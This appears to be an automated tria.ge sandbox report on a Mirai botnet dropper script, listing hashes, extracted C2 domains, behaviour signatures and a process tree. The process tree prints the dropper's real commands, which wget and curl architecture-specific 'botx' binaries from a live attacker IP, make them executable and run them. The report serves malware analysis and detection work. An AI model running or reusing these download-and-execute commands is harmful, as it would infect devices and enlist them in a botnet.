Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    29/12/2024, 21:33

General

  • Target

    51.79.141.121-sora.sh-2024-12-29T211113.sh

  • Size

    2KB

  • MD5

    0569b09a5951d5fe444efa1892b87687

  • SHA1

    0d3df40a37ec718be33d83c1c9a962e982a51d17

  • SHA256

    6c568bd265a5c182913cd277c88a151c797dfeb05244edaf156dea1b389a0baa

  • SHA512

    fbdf5cd3d7ee86f61d205e2745661444152304f594c73562a5b7d59adfdfed3adadbb59954afb7618f64d29e283ef15e1dfaf82cef3a79dc74c08cda5580b11d

Malware Config

Extracted

Family

mirai

Botnet

CONDI

C2

botnet.tfmobile.store

report.tfmobile.store

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Mirai family
  • Contacts a large (37233) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 14 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 14 IoCs
  • Modifies Watchdog functionality 1 TTPs 28 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Enumerates active TCP sockets 1 TTPs 13 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

  • Writes file to system bin folder 14 IoCs
  • Changes its process name 14 IoCs
  • Reads system network configuration 1 TTPs 13 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • System Network Configuration Discovery 1 TTPs 2 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 24 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/51.79.141.121-sora.sh-2024-12-29T211113.sh
    /tmp/51.79.141.121-sora.sh-2024-12-29T211113.sh
    1⤵
    • Writes file to tmp directory
    PID:1464
    • /usr/bin/wget
      wget http://51.79.141.121/where/botx.x86
      2⤵
      • Writes file to tmp directory
      PID:1465
    • /usr/bin/curl
      curl -O http://51.79.141.121/where/botx.x86
      2⤵
      • Writes file to tmp directory
      PID:1478
    • /bin/cat
      cat botx.x86
      2⤵
        PID:1485
      • /bin/chmod
        chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.x86 config-err-KaZKo5 netplan_shzgbutu robben snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-tomK8K
        2⤵
        • File and Directory Permissions Modification
        PID:1486
      • /tmp/robben
        ./robben Payload
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Writes file to system bin folder
        • Changes its process name
        PID:1487
      • /usr/bin/wget
        wget http://51.79.141.121/where/botx.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1489
      • /usr/bin/curl
        curl -O http://51.79.141.121/where/botx.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1491
      • /bin/chmod
        chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.mips botx.x86 config-err-KaZKo5 netplan_shzgbutu robben snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-tomK8K
        2⤵
        • File and Directory Permissions Modification
        PID:1495
      • /tmp/robben
        ./robben Payload
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Enumerates active TCP sockets
        • Writes file to system bin folder
        • Changes its process name
        • Reads system network configuration
        PID:1496
      • /usr/bin/wget
        wget http://51.79.141.121/where/botx.x86_64
        2⤵
          PID:1498
        • /usr/bin/curl
          curl -O http://51.79.141.121/where/botx.x86_64
          2⤵
          • Writes file to tmp directory
          PID:1499
        • /bin/chmod
          chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.mips botx.x86 botx.x86_64 config-err-KaZKo5 netplan_shzgbutu robben snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-tomK8K
          2⤵
          • File and Directory Permissions Modification
          PID:1503
        • /tmp/robben
          ./robben Payload
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Writes file to system bin folder
          • Changes its process name
          • Reads system network configuration
          PID:1504
        • /usr/bin/wget
          wget http://51.79.141.121/where/botx.i468
          2⤵
            PID:1506
          • /usr/bin/curl
            curl -O http://51.79.141.121/where/botx.i468
            2⤵
            • Writes file to tmp directory
            PID:1507
          • /bin/chmod
            chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.i468 botx.mips botx.x86 botx.x86_64 config-err-KaZKo5 netplan_shzgbutu robben snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-tomK8K
            2⤵
            • File and Directory Permissions Modification
            PID:1511
          • /tmp/robben
            ./robben Payload
            2⤵
            • Executes dropped EXE
            • Modifies Watchdog functionality
            • Enumerates active TCP sockets
            • Writes file to system bin folder
            • Changes its process name
            • Reads system network configuration
            PID:1512
          • /usr/bin/wget
            wget http://51.79.141.121/where/botx.i686
            2⤵
              PID:1514
            • /usr/bin/curl
              curl -O http://51.79.141.121/where/botx.i686
              2⤵
              • Writes file to tmp directory
              PID:1515
            • /bin/chmod
              chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.i468 botx.i686 botx.mips botx.x86 botx.x86_64 config-err-KaZKo5 netplan_shzgbutu robben snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-tomK8K
              2⤵
              • File and Directory Permissions Modification
              PID:1519
            • /tmp/robben
              ./robben Payload
              2⤵
              • Executes dropped EXE
              • Modifies Watchdog functionality
              • Enumerates active TCP sockets
              • Writes file to system bin folder
              • Changes its process name
              • Reads system network configuration
              PID:1520
            • /usr/bin/wget
              wget http://51.79.141.121/where/botx.mpsl
              2⤵
              • Writes file to tmp directory
              PID:1522
            • /usr/bin/curl
              curl -O http://51.79.141.121/where/botx.mpsl
              2⤵
              • Writes file to tmp directory
              PID:1527
            • /bin/chmod
              chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 config-err-KaZKo5 netplan_shzgbutu robben snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3
              2⤵
              • File and Directory Permissions Modification
              PID:1529
            • /tmp/robben
              ./robben Payload
              2⤵
              • Executes dropped EXE
              • Modifies Watchdog functionality
              • Enumerates active TCP sockets
              • Writes file to system bin folder
              • Changes its process name
              • Reads system network configuration
              PID:1530
            • /usr/bin/wget
              wget http://51.79.141.121/where/botx.arm4
              2⤵
                PID:1532
              • /usr/bin/curl
                curl -O http://51.79.141.121/where/botx.arm4
                2⤵
                • Writes file to tmp directory
                PID:1533
              • /bin/chmod
                chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 config-err-KaZKo5 netplan_shzgbutu robben snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3
                2⤵
                • File and Directory Permissions Modification
                PID:1537
              • /tmp/robben
                ./robben Payload
                2⤵
                • Executes dropped EXE
                • Modifies Watchdog functionality
                • Enumerates active TCP sockets
                • Writes file to system bin folder
                • Changes its process name
                • Reads system network configuration
                PID:1538
              • /usr/bin/wget
                wget http://51.79.141.121/where/botx.arm5
                2⤵
                • Writes file to tmp directory
                PID:1540
              • /usr/bin/curl
                curl -O http://51.79.141.121/where/botx.arm5
                2⤵
                • Writes file to tmp directory
                PID:1543
              • /bin/chmod
                chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 config-err-KaZKo5 netplan_shzgbutu robben snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3
                2⤵
                • File and Directory Permissions Modification
                PID:1545
              • /tmp/robben
                ./robben Payload
                2⤵
                • Executes dropped EXE
                • Modifies Watchdog functionality
                • Enumerates active TCP sockets
                • Writes file to system bin folder
                • Changes its process name
                • Reads system network configuration
                PID:1546
              • /usr/bin/wget
                wget http://51.79.141.121/where/botx.arm6
                2⤵
                • Writes file to tmp directory
                PID:1548
              • /usr/bin/curl
                curl -O http://51.79.141.121/where/botx.arm6
                2⤵
                • Writes file to tmp directory
                PID:1551
              • /bin/chmod
                chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.arm6 botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 config-err-KaZKo5 netplan_shzgbutu robben snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3
                2⤵
                • File and Directory Permissions Modification
                PID:1553
              • /tmp/robben
                ./robben Payload
                2⤵
                • Executes dropped EXE
                • Modifies Watchdog functionality
                • Enumerates active TCP sockets
                • Writes file to system bin folder
                • Changes its process name
                • Reads system network configuration
                PID:1554
              • /usr/bin/wget
                wget http://51.79.141.121/where/botx.arm7
                2⤵
                • Writes file to tmp directory
                PID:1556
              • /usr/bin/curl
                curl -O http://51.79.141.121/where/botx.arm7
                2⤵
                • Writes file to tmp directory
                PID:1559
              • /bin/chmod
                chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.arm6 botx.arm7 botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 config-err-KaZKo5 netplan_shzgbutu robben snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3
                2⤵
                • File and Directory Permissions Modification
                PID:1561
              • /tmp/robben
                ./robben Payload
                2⤵
                • Executes dropped EXE
                • Modifies Watchdog functionality
                • Enumerates active TCP sockets
                • Writes file to system bin folder
                • Changes its process name
                • Reads system network configuration
                PID:1562
              • /usr/bin/wget
                wget http://51.79.141.121/where/botx.ppc
                2⤵
                • Writes file to tmp directory
                PID:1564
              • /usr/bin/curl
                curl -O http://51.79.141.121/where/botx.ppc
                2⤵
                • Writes file to tmp directory
                PID:1567
              • /bin/chmod
                chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.arm6 botx.arm7 botx.i468 botx.i686 botx.mips botx.mpsl botx.ppc botx.x86 botx.x86_64 config-err-KaZKo5 netplan_shzgbutu robben snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3
                2⤵
                • File and Directory Permissions Modification
                PID:1569
              • /tmp/robben
                ./robben Payload
                2⤵
                • Executes dropped EXE
                • Modifies Watchdog functionality
                • Enumerates active TCP sockets
                • Writes file to system bin folder
                • Changes its process name
                • Reads system network configuration
                PID:1570
              • /usr/bin/wget
                wget http://51.79.141.121/where/botx.ppc440fp
                2⤵
                  PID:1572
                • /usr/bin/curl
                  curl -O http://51.79.141.121/where/botx.ppc440fp
                  2⤵
                  • Writes file to tmp directory
                  PID:1573
                • /bin/chmod
                  chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.arm6 botx.arm7 botx.i468 botx.i686 botx.mips botx.mpsl botx.ppc botx.ppc440fp botx.x86 botx.x86_64 config-err-KaZKo5 netplan_shzgbutu robben snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3
                  2⤵
                  • File and Directory Permissions Modification
                  PID:1577
                • /tmp/robben
                  ./robben Payload
                  2⤵
                  • Executes dropped EXE
                  • Modifies Watchdog functionality
                  • Enumerates active TCP sockets
                  • Writes file to system bin folder
                  • Changes its process name
                  • Reads system network configuration
                  PID:1578
                • /usr/bin/wget
                  wget http://51.79.141.121/where/botx.m68k
                  2⤵
                  • Writes file to tmp directory
                  PID:1580
                • /usr/bin/curl
                  curl -O http://51.79.141.121/where/botx.m68k
                  2⤵
                  • Writes file to tmp directory
                  PID:1583
                • /bin/chmod
                  chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.arm6 botx.arm7 botx.i468 botx.i686 botx.m68k botx.mips botx.mpsl botx.ppc botx.ppc440fp botx.x86 botx.x86_64 config-err-KaZKo5 netplan_shzgbutu robben snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3
                  2⤵
                  • File and Directory Permissions Modification
                  PID:1585
                • /tmp/robben
                  ./robben Payload
                  2⤵
                  • Executes dropped EXE
                  • Modifies Watchdog functionality
                  • Enumerates active TCP sockets
                  • Writes file to system bin folder
                  • Changes its process name
                  • Reads system network configuration
                  PID:1586
                • /usr/bin/wget
                  wget http://51.79.141.121/where/botx.sh4
                  2⤵
                  • Writes file to tmp directory
                  PID:1588
                • /usr/bin/curl
                  curl -O http://51.79.141.121/where/botx.sh4
                  2⤵
                  • Writes file to tmp directory
                  PID:1591
                • /bin/chmod
                  chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.arm6 botx.arm7 botx.i468 botx.i686 botx.m68k botx.mips botx.mpsl botx.ppc botx.ppc440fp botx.sh4 botx.x86 botx.x86_64 config-err-KaZKo5 netplan_shzgbutu robben snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3
                  2⤵
                  • File and Directory Permissions Modification
                  PID:1593
                • /tmp/robben
                  ./robben Payload
                  2⤵
                  • Executes dropped EXE
                  • Modifies Watchdog functionality
                  • Enumerates active TCP sockets
                  • Writes file to system bin folder
                  • Changes its process name
                  • Reads system network configuration
                  PID:1594

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • /tmp/botx.x86

                Filesize

                50KB

                MD5

                1092f7846a6ca7a5e92ece0ea93ff82e

                SHA1

                140fd3e84c49d382e6b0f9a40730d1cd465f8347

                SHA256

                a5ddb64df4b96bfeae6860981f98b4845df83db34ffaf238548bede6067f15c2

                SHA512

                11ba6cdfba1784d5f2895f351def8d6a4dc0d5efd56b735978d1ff7416d2a52da07931250f37311362c8d522f7db89e3ac8bf1de890302afa6281ce2a2f6b2ba